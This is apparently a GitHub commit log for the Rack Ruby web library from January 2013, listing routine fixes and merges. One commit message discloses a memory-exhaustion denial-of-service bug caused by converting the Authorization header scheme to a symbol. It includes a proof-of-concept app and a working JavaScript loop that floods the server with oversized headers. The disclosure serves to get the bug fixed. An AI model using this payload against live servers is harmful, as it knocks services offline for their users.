Permalink
Commits on Jan 22, 2013
  1. Switch to RFC 2822 expires

    raggi committed Jan 22, 2013
Commits on Jan 21, 2013
  1. Fix a long standing misnomer for date formats

    References #414
    raggi committed Jan 21, 2013
  2. Use Dir.tmpdir instead of hardcoded /tmp

    Closes #492
    raggi committed Jan 21, 2013
  3. Don't modify the middleware hash in Rack::Server

     * Closes #498
    raggi committed Jan 21, 2013
  4. Merge pull request #496 from homakov/patch-3

    Remove never called string
    raggi committed Jan 21, 2013
Commits on Jan 14, 2013
  1. Remove never called string

    Previous check `p.empty?` makes sure that p contains at least 1 symbol.
    After `.split('=', 2)` k or v or both will turn into some string which means `k || v` will always return true and `next` will never be called.
    homakov committed Jan 14, 2013
Commits on Jan 13, 2013
  1. Update to 1.5.0.beta.2

    raggi committed Jan 13, 2013
  2. Update README security notes

    raggi committed Jan 13, 2013
  3. Rack::Auth::AbstractRequest#scheme returns strings

     * This is a breaking API change, but doesn't appear to be used in public
    raggi committed Jan 13, 2013
  4. Squash test warnings

    raggi committed Jan 13, 2013
  5. Squash warnings in spec_auth

    raggi committed Jan 13, 2013
  6. Reimplement auth scheme fix

     * Add Rack::Auth.add_scheme to enable folks to fix anything that breaks
     * Add common auth schemes, MS ones, AWS ones, etc are missing, as unlikely
     * Checked Rails - they don't use our authorization code
     * Checked Warden - uses rails
     * Checked Omniauth - uses rails
     * Checked doorkeeper - users rails
     * Checked rack-authentication - does it's own thing
     * Checked warden-oauth - doesn't do headers
     * Checked devise - uses rails
     * Checked oauth2-rack - header creation only
     * Checked rack-oauth2-server - does it's own thing
     * Probably missed a bunch, but that'll have to do
    raggi committed Jan 13, 2013
  7. Revert "Merge pull request #494 from homakov/patch-2"

    This reverts commit 9b76e4f, reversing
    changes made to bf32f4b.
    raggi committed Jan 13, 2013
  8. Merge pull request #494 from homakov/patch-2

    Remove .to_sym in Authorization scheme
    rkh committed Jan 13, 2013
  9. Remove .to_sym in Authorization scheme

    Hello, `.to_sym` should never be applied on user input. Thus I recommend you to change `scheme` method:
    ```
      def scheme
        @scheme ||= parts.first.downcase.to_sym
      end
    ```
    While we can't send enourmous emount of `Authorization` headers we can make it as long as it's possible. 
    This is PoC. App:
    ```
    cat config.ru 
    require 'rack'
    run lambda{|e|
        auth =  Rack::Auth::Basic::Request.new(e)
        puts auth.basic? if auth.provided?
        puts Symbol.all_symbols.size
        [200, {'Content-Type'=>'text/html'},['IM FINE']]
    }
    ```
    Simple Javascript to DoS it:
    ```
    var base = ["aa", "ab", "ac", "ad", "ae", "af", "ag", "ah", "ai", "aj", "ak", "al", "am", "an", "ao", "ap", "aq", "ar", "as", "at", "au", "av", "aw", "ax", "ay", "az", "ba", "bb", "bc", "bd", "be", "bf", "bg", "bh", "bi", "bj", "bk", "bl", "bm", "bn", "bo", "bp", "bq", "br", "bs", "bt", "bu", "bv", "bw", "bx", "by", "bz", "ca", "cb", "cc", "cd", "ce", "cf", "cg", "ch", "ci", "cj", "ck", "cl", "cm", "cn", "co", "cp", "cq", "cr", "cs", "ct", "cu", "cv", "cw", "cx", "cy", "cz", "da", "db", "dc", "dd", "de", "df", "dg", "dh", "di", "dj", "dk", "dl", "dm", "dn", "do", "dp", "dq", "dr", "ds", "dt", "du", "dv", "dw", "dx", "dy", "dz", "ea", "eb", "ec", "ed", "ee", "ef", "eg", "eh", "ei", "ej", "ek", "el", "em", "en", "eo", "ep", "eq", "er", "es", "et", "eu", "ev", "ew", "ex", "ey", "ez", "fa", "fb", "fc", "fd", "fe", "ff", "fg", "fh", "fi", "fj", "fk", "fl", "fm", "fn", "fo", "fp", "fq", "fr", "fs", "ft", "fu", "fv", "fw", "fx", "fy", "fz", "ga", "gb", "gc", "gd", "ge", "gf", "gg", "gh", "gi", "gj", "gk", "gl", "gm", "gn", "go", "gp", "gq", "gr", "gs", "gt", "gu", "gv", "gw", "gx", "gy", "gz", "ha", "hb", "hc", "hd", "he", "hf", "hg", "hh", "hi", "hj", "hk", "hl", "hm", "hn", "ho", "hp", "hq", "hr", "hs", "ht", "hu", "hv", "hw", "hx", "hy", "hz", "ia", "ib", "ic", "id", "ie", "if", "ig", "ih", "ii", "ij", "ik", "il", "im", "in", "io", "ip", "iq", "ir", "is", "it", "iu", "iv", "iw", "ix", "iy", "iz", "ja", "jb", "jc", "jd", "je", "jf", "jg", "jh", "ji", "jj"];
    var total_sent = 0
    for(var num in base){
    	var x = new XMLHttpRequest;
    	x.open('GET','/'); 
    	str = '';
    	for(i=0;i<2000000;i++){
    	    str+='Ё'+base[num]+i;
    	}
    	x.setRequestHeader('Authorization',str+' lol')
    	x.send();
    	console.log('Total sent: ',total_sent+=str.length);
    }
    ```
    When we run JS every request carries 18888890 letters in a symbol. This 'data' will never be garbarge collectored.
    Should it be fixed?
    homakov committed Jan 13, 2013
Commits on Jan 11, 2013
  1. Merge branch 'hijack'

    * hijack:
      Hijack SPEC changes after review discussion
      Add straw man for the after-headers hijack
      Straw man for rack.hijack*, connection hijacking!
    raggi committed Jan 11, 2013
  2. Add q-value helpers for Accept headers, etc.

     * Supersedes and closes #443
    raggi committed Jan 11, 2013
  3. Minor code review comments closing #451

     * Adds documentation
     * find is preferred over detect
     * Superseded body objects should be closed
    raggi committed Jan 11, 2013
  4. Revert "Set TMPDIR to fix Dir.mktmpdir under jRuby"

    This reverts commit 3b24fa9.
    raggi committed Jan 11, 2013
  5. Merge branch 'sendfile_path_mapping' of git://github.com/Casecommons/…

    …rack into sendfile
    
    * 'sendfile_path_mapping' of git://github.com/Casecommons/rack:
      Set TMPDIR to fix Dir.mktmpdir under jRuby
      Additional Ruby 1.8 compaitiblity
      Make spec_sendfile work with Ruby < 1.9
      Initialize Rack::Sendfile with accel mappings
    raggi committed Jan 11, 2013
  6. Enable unix sockets with paths as trusted proxies

     * Supersedes and closes #488
    raggi committed Jan 11, 2013
  7. Merge pull request #491 from spastorino/allow_build_different_session…

    …_object
    
    Allow subclasses build a different Session Object
    raggi committed Jan 11, 2013
  8. Merge pull request #490 from slivu/master

    Added Reel Web Server and Espresso Framework to supported software list
    raggi committed Jan 11, 2013
  9. Merge pull request #489 from spastorino/abstract_id_tiny_patches

    Abstract id tiny patches
    raggi committed Jan 11, 2013
Commits on Jan 10, 2013
  1. Update README.rdoc

    slivu committed Jan 10, 2013
Commits on Jan 9, 2013
Commits on Jan 7, 2013
  1. Merge pull request #487 from carlosantoniodasilva/remove-warnings

    Remove warnings: 'not used variable' and 'shadowing outer variable'
    raggi committed Jan 7, 2013